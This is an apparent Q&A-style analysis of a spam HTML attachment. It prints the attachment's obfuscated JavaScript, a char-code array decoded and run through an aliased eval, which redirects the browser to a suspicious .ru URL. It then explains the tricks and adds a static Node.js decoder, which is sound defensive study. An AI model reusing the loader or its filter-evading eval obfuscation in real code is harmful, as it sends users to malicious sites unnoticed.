Javascript obfuscation - learning from the bad guys
I received some spam this morning. I noticed the attachment was a .html file. Rather than treating it as junk, I treated it as a learning opportunity: I copied it to my desktop, renamed it to .txt and loaded it in Notepad. Here is the html + obfuscated script as shown in the spam attachment:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Please wait</title>
</head>
<body>
<h1><b>Please wait. You will be forwarded.. . </h1></b>
<h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>
<script>asgq= [0x76,0x61,0x72,0x31,0x3d,0x34,0x39,0x3b,0xa,0x76,0x61,0x72,0x32,0x3d,0x76,0x61,0x72,0x31,0x3b,0xa,0x69,0x66,0x28,0x76,0x61,0x72,0x31,0x3d,0x3d,0x76,0x61,0x72,0x32,0x29,0x20,0x7b,0x64,0x6f,0x63,0x75,0x6d,0x65,0x6e,0x74,0x2e,0x6c,0x6f,0x63,0x61,0x74,0x69,0x6f,0x6e,0x3d,0x22,0x68,0x74,0x74,0x70,0x3a,0x2f,0x2f,0x67,0x69,0x6c,0x69,0x61,0x6f,0x6e,0x73,0x6f,0x2e,0x72,0x75,0x3a,0x38,0x30,0x38,0x30,0x2f,0x66,0x6f,0x72,0x75,0x6d,0x2f,0x6c,0x69,0x6e,0x6b,0x73,0x2f,0x63,0x6f,0x6c,0x75,0x6d,0x6e,0x2e,0x70,0x68,0x70,0x22,0x3b,0x7d];try{document.body&=0.1}catch(gdsgsdg){zz=3;dbshre=56;if(dbshre){vfvwe=0; try{}catch(agdsg){vfvwe=1;}if(!vfvwe){e=window["e".concat("val")];}
s="";for(i=0;i-105!=0;i++){if(window.document)s+=String.fromCharCode(asgq[i]);}
z=s;e(s);}}</script>
</body>
</html>
The first thing I did was line it up to make it more readable:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Please wait</title>
</head>
<body>
<h1><b>Please wait. You will be forwarded.. . </h1></b>
<h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>
<script>
asgq=[0x76,0x61,0x72,0x31,0x3d,0x34,0x39,0x3b,0xa,0x76,0x61,0x72,0x32,0x3d,0x76,0x61,0x72,0x31,0x3b,0xa,0x69,0x66,0x28,0x76,0x61,0x72,0x31,0x3d,0x3d,0x76,0x61,0x72,0x32,0x29,0x20,0x7b,0x64,0x6f,0x63,0x75,0x6d,0x65,0x6e,0x74,0x2e,0x6c,0x6f,0x63,0x61,0x74,0x69,0x6f,0x6e,0x3d,0x22,0x68,0x74,0x74,0x70,0x3a,0x2f,0x2f,0x67,0x69,0x6c,0x69,0x61,0x6f,0x6e,0x73,0x6f,0x2e,0x72,0x75,0x3a,0x38,0x30,0x38,0x30,0x2f,0x66,0x6f,0x72,0x75,0x6d,0x2f,0x6c,0x69,0x6e,0x6b,0x73,0x2f,0x63,0x6f,0x6c,0x75,0x6d,0x6e,0x2e,0x70,0x68,0x70,0x22,0x3b,0x7d];
try{document.body&=0.1}
catch(gdsgsdg)
{
zz=3;
dbshre=56;
if(dbshre){
vfvwe=0;
try{}
catch(agdsg)
{vfvwe=1;}
if(!vfvwe){
e=window["e".concat("val")];
s="";
for(i=0;i-105!=0;i++){
if(window.document)
s+=String.fromCharCode(asgq[i]);
}
z=s;
e(s);
}
}
</script>
</body>
</html>
At this point it is obvious that the script author is hiding the goodies in the asgq array as character codes. 0x76 = "v", 0x61 = "a", 0x72 = "r", and so on... Hmm, the first 3 elements already spell "var".
asgq.length = 105. In the for loop, the author uses the end condition "i-105!=0", which is a confusing way of saying i < 105.
1) Assigning to document.body will throw an error:
document.body&=0.1
//is the same as
document.body = document.body & 0.1;
//document.body & *anything* returns 0
2) catch takes a variable name as its parameter; you can name it whatever you like (including agdsg).
3) Let's break it down:
e=window["e".concat("val")];
//"e".concat("val") returns "eval"
e=window["eval"]
//which gives you the global "eval()" function
Basically, the author decodes that array into a string of code to execute, then uses eval() to run it. The reason they don't just write eval("var...") is that obfuscating the eval away (along with the string) makes it harder for a filter (or a person) to see that it is running eval. If it knew it was running eval, it could inspect the string and stop the redirect code.

2. No matter what you name it, it always does the same thing, because it is just a variable name. 3. What happens if you take "e" and concat "val"?

@IgorJerosimić: there is a very relevant reason, though. The author intends to hide the code, so renaming variables is a very easy way to get past antivirus hash checks.

catch takes a variable; you can name it whatever you like (such as agdsg).

@system, that's evil!! So the author is using: eval(s).
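Here is an added example (not from the original question or its answers) of how a defender decodes that array statically, without letting the page run: it pulls the asgq array literal out of the attachment text, maps the codes through String.fromCharCode offline, reports any URL in the result, and flags the window["e".concat("val")] eval alias. It is written for Node.js; the attachment's script block is embedded as constructed input copied from the sample above, and the function names are my own.

```javascript
// Added example (not from the original post): static decoder for the
// "char-code array + aliased eval" pattern in the attachment above. Nothing is
// executed; the array literal is pulled out with a regex and mapped to text.

// Constructed input: the attachment's <script> block, copied verbatim.
const SAMPLE_HTML =
  '<script>asgq= [0x76,0x61,0x72,0x31,0x3d,0x34,0x39,0x3b,0xa,0x76,0x61,0x72,' +
  '0x32,0x3d,0x76,0x61,0x72,0x31,0x3b,0xa,0x69,0x66,0x28,0x76,0x61,0x72,0x31,' +
  '0x3d,0x3d,0x76,0x61,0x72,0x32,0x29,0x20,0x7b,0x64,0x6f,0x63,0x75,0x6d,0x65,' +
  '0x6e,0x74,0x2e,0x6c,0x6f,0x63,0x61,0x74,0x69,0x6f,0x6e,0x3d,0x22,0x68,0x74,' +
  '0x74,0x70,0x3a,0x2f,0x2f,0x67,0x69,0x6c,0x69,0x61,0x6f,0x6e,0x73,0x6f,0x2e,' +
  '0x72,0x75,0x3a,0x38,0x30,0x38,0x30,0x2f,0x66,0x6f,0x72,0x75,0x6d,0x2f,0x6c,' +
  '0x69,0x6e,0x6b,0x73,0x2f,0x63,0x6f,0x6c,0x75,0x6d,0x6e,0x2e,0x70,0x68,0x70,' +
  '0x22,0x3b,0x7d];try{document.body&=0.1}catch(gdsgsdg){zz=3;dbshre=56;' +
  'if(dbshre){vfvwe=0;try{}catch(agdsg){vfvwe=1;}if(!vfvwe){' +
  'e=window["e".concat("val")];}s="";for(i=0;i-105!=0;i++){' +
  'if(window.document)s+=String.fromCharCode(asgq[i]);}z=s;e(s);}}</script>';

// Every `name=[n,n,...]` literal whose elements are hex or decimal integers.
function extractNumericArrays(source) {
  const num = '(?:0x[0-9a-fA-F]+|\\d+)';
  const re = new RegExp('([A-Za-z_$][\\w$]*)\\s*=\\s*\\[\\s*(' + num +
                        '\\s*(?:,\\s*' + num + '\\s*)*)\\]', 'g');
  const found = {};
  for (let m; (m = re.exec(source)) !== null;) {
    found[m[1]] = m[2].split(',').map((t) => Number(t.trim()));
  }
  return found;
}

// True when eval is reached through a name built at runtime, as in the sample.
function usesEvalAlias(source) {
  return /window\s*\[\s*["']e["']\s*\.concat\(\s*["']val["']\s*\)\s*\]/.test(source) ||
         /window\s*\[\s*["']eval["']\s*\]/.test(source);
}

// Report: decoded text of each array plus any URL (redirect target) inside it.
function analyseAttachment(html) {
  const report = { evalAlias: usesEvalAlias(html), arrays: {} };
  for (const [name, codes] of Object.entries(extractNumericArrays(html))) {
    const decoded = String.fromCharCode(...codes); // the for loop's step, done offline
    report.arrays[name] = { length: codes.length, decoded,
                            urls: decoded.match(/https?:\/\/[^\s"'<>]+/g) || [] };
  }
  return report;
}
```

Running analyseAttachment(SAMPLE_HTML) shows the 105-character payload and its redirect URL without the browser ever evaluating it, which is the check a mail filter or analyst wants before deciding what the attachment does.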